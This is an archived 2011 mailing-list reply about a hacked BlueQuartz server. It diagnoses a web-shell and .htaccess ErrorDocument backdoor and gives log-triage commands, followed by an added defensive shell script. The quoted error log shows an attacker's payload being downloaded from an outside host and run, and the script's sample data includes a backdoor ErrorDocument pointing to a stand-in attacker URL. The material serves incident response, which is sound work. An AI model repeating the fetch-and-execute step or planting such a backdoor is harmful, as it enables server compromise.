<html>
<head>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="Content-Type">
</head>
<body bgcolor="#FFFFFF" text="#000000">
Hi Steffan.<br>
<br>
On 13/10/2011 11:07 PM, Steffan wrote:
<blockquote cite="mid:035501cc89a0$adf159f0$09d40dd0$@nl"
type="cite">
<div class="WordSection1">
<p class="MsoNormal"><span lang="EN-US">I still have a client with a BlueQuartz server (VPS).</span></p>
<p class="MsoNormal"><span lang="EN-US">This morning the virtual server was hacked.</span></p>
<p class="MsoNormal"><span lang="EN-US">I looked in the logs and found this in /var/log/httpd/error_log:</span></p>
</div>
</blockquote>
<br>
I've seen almost identical attacks recently. I saw someone using an
old PHP application (an old copy of creloaded) which contained
security vulnerabilities. This happened on a BlueOnyx server - and
due to the open_basedir restrictions, the damage was restricted to
one vsite. (Thank you Michael for open_basedir integration - it's one
of the most powerful additions in BlueOnyx.)<br>
<br>
The bad guys installed a web based tool that allows remote users to
browse the file system, get files etc. and to upload and
manipulate other files. Their next action was to install a web based
spam injection tool, which received spam commands via XML. Check
your postmaster inbox for a higher than normal number of
undeliverable messages; this will be a good indication if they've
done this to you.<br>
<br>
My suggestion to you for troubleshooting: look at your access logs.
Most HTTP injections are controlled by POST requests in your web
log.<br>
<br>
<pre wrap="">grep POST /var/log/httpd/access_log | cut -d " " -f 1,8 | cut -d "?" -f 1 | sort | uniq -c | sort -nr | less</pre>
<br>
This command will produce a list of URLs where POST commands
are used on your server, sorted by frequency of use. Look for items
that are unfamiliar to you - particularly those that are getting a
lot of hits.<br>
<br>
Another hint, one specific to your situation:<br>
<br>
<pre wrap="">ls -l `locate .htaccess`</pre>
<br>
Look at the dates of the .htaccess files - one or more of them will
have a recent date stamp. View the file, and you will find where
the error documents are pointing to an external URL. Some older
versions of Apache pull this error document externally, and execute
the PHP code on your system. (Not sure if this is still a problem on
BlueQuartz - but it was ages ago.) The bad guys use this so that if
you clean up the initial problem, they still have a backdoor back
into your system. The bot in this case appears to connect back to an
IRC server for remote control.<br>
<br>
Best of luck cleaning up your server.<br>
<br>
Greg.<br>
<br>
<blockquote cite="mid:035501cc89a0$adf159f0$09d40dd0$@nl"
type="cite">
<div class="WordSection1">
<pre wrap="">[Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no acceptable variant: /usr/sausalito/ui/web/error/fileNotFound.html
--00:07:40--  <a class="moz-txt-link-freetext" href="http://rapha.altervista.org/prv.txt">http://rapha.altervista.org/prv.txt</a>
           => `prv.txt'
Resolving rapha.altervista.org... 46.4.65.68
Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,039 (27K) [text/plain]

    0K .......... .......... .......                          100% 1015.53 KB/s

00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039]

sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
^M 14 28039   14  4097    0     0  98324      0 --:--:-- --:--:-- --:--:-- 98324^M100 28039  100 28039    0     0   403k      0 --:--:-- --:--:-- --:--:--  899k
sh: line 3: prv.txt: command not found
--00:07:40--  <a class="moz-txt-link-freetext" href="http://rapha.altervista.org/prv.txt">http://rapha.altervista.org/prv.txt</a>
           => `prv.txt'
Resolving rapha.altervista.org... 46.4.65.68
Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,039 (27K) [text/plain]

    0K .......... .......... .......                          100% 1020.34 KB/s

00:07:40 (1020.34 KB/s) - `prv.txt' saved [28039/28039]

sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
^M  4 28039    4  1201    0     0  42493      0 --:--:-- --:--:-- --:--:-- 42493^M100 28039  100 28039    0     0   507k      0 --:--:-- --:--:-- --:--:-- 1048k
sh: line 3: prv.txt: command not found
</pre>
<p class="MsoNormal"><span lang="EN-US">I don't see any admin logins.</span></p>
<p class="MsoNormal"><span lang="EN-US">How can I find out what happened?<br>
I don't see anything weird in the access log or message log.</span></p>
<p class="MsoNormal"><span lang="EN-US">Thanxs Steffan</span></p>
</div>
<br>
<br>
<pre wrap="">_______________________________________________
Blueonyx mailing list
<a class="moz-txt-link-abbreviated" href="mailto:Blueonyx@mail.blueonyx.it">Blueonyx@mail.blueonyx.it</a>
<a class="moz-txt-link-freetext" href="http://mail.blueonyx.it/mailman/listinfo/blueonyx">http://mail.blueonyx.it/mailman/listinfo/blueonyx</a>
</pre>
</blockquote>
<br>
<br>
<pre class="moz-signature" cols="72">--
+---------------------------------------------------------------------+
| / \ Greg Kuhnert,<a class="moz-txt-link-abbreviated" href="mailto:gkuhnert@compassnetworks.com.au">gkuhnert@compassnetworks.com.au</a> |
| < o > Compass Networks - Pointing you in the right direction |
| \ / See us for BlueQuartz / BlueOnyx modules and Support. |
+---------------------------------------------------------------------+</pre>
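<p>The two triage checks Greg describes (POST-target frequency from the access log, and .htaccess files with ErrorDocument targets pointing off-host), written up as reusable shell functions. This is an added example, not Greg's own commands or anything shipped with BlueQuartz/BlueOnyx; it assumes a vhost-first Apache log format (<code>%v %h %l %u %t "%r" ...</code>) so that the request path is field 8 as in the quoted pipeline, and all log and .htaccess data below is constructed.</p>

```shell
#!/bin/sh
# Added example, not Greg's own commands: his two triage checks as reusable
# functions, run here over constructed sample data so the script works offline.
# Assumes the Apache log format carries the vhost first (%v %h %l %u %t "%r" ...),
# so the request path is field 8, as in the pipeline quoted in the message.

# Constructed sample access log lines (not real traffic).
SAMPLE_LOG='www.example.test 203.0.113.5 - - [12/Oct/2011:00:07:13 +0200] "POST /shop/includes/upload.php?x=1 HTTP/1.1" 200 512
www.example.test 203.0.113.5 - - [12/Oct/2011:00:07:14 +0200] "POST /shop/includes/upload.php?x=2 HTTP/1.1" 200 512
www.example.test 198.51.100.7 - - [12/Oct/2011:00:08:01 +0200] "GET /index.html HTTP/1.1" 200 1024
www.example.test 198.51.100.9 - - [12/Oct/2011:00:09:00 +0200] "POST /contact.php HTTP/1.1" 200 300'

# Constructed .htaccess contents: one benign, one whose 404 handler is fetched off-host.
HTACCESS_CLEAN='ErrorDocument 404 /errors/404.html
Options -Indexes'
HTACCESS_SUSPECT='ErrorDocument 404 http://attacker.example.invalid/e.php
ErrorDocument 500 /errors/500.html'

# POST targets (vhost + path, query string dropped), most frequent first.
# Reads the log from stdin so a real access_log can be piped in instead.
post_targets() {
    grep POST | cut -d " " -f 1,8 | cut -d "?" -f 1 | sort | uniq -c | sort -nr
}

# ErrorDocument directives whose target is an absolute http(s) URL, read from stdin.
# A local path or a quoted message is normal; an off-host URL is the pattern described.
external_errordocs() {
    grep -iE '^[[:space:]]*ErrorDocument[[:space:]]+[0-9]{3}[[:space:]]+https?://' || :
}

# .htaccess files under $1 changed within the last $2 days, each checked for
# off-host ErrorDocument targets; prints the path followed by the offending lines.
scan_htaccess_tree() {
    find "$1" -name .htaccess -type f -mtime "-$2" | while IFS= read -r f; do
        hits=$(external_errordocs < "$f")
        if [ -n "$hits" ]; then printf '%s\n%s\n' "$f" "$hits"; fi
    done
}

# Stand-alone demonstration on the constructed data.
printf '%s\n' "$SAMPLE_LOG" | post_targets
printf '%s\n' "$HTACCESS_SUSPECT" | external_errordocs
```

<p>On a live server, feed <code>post_targets</code> the real log (<code>post_targets &lt; /var/log/httpd/access_log</code>) and point <code>scan_htaccess_tree</code> at the vsite document roots with a window of a few days.</p>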
</body>
</html>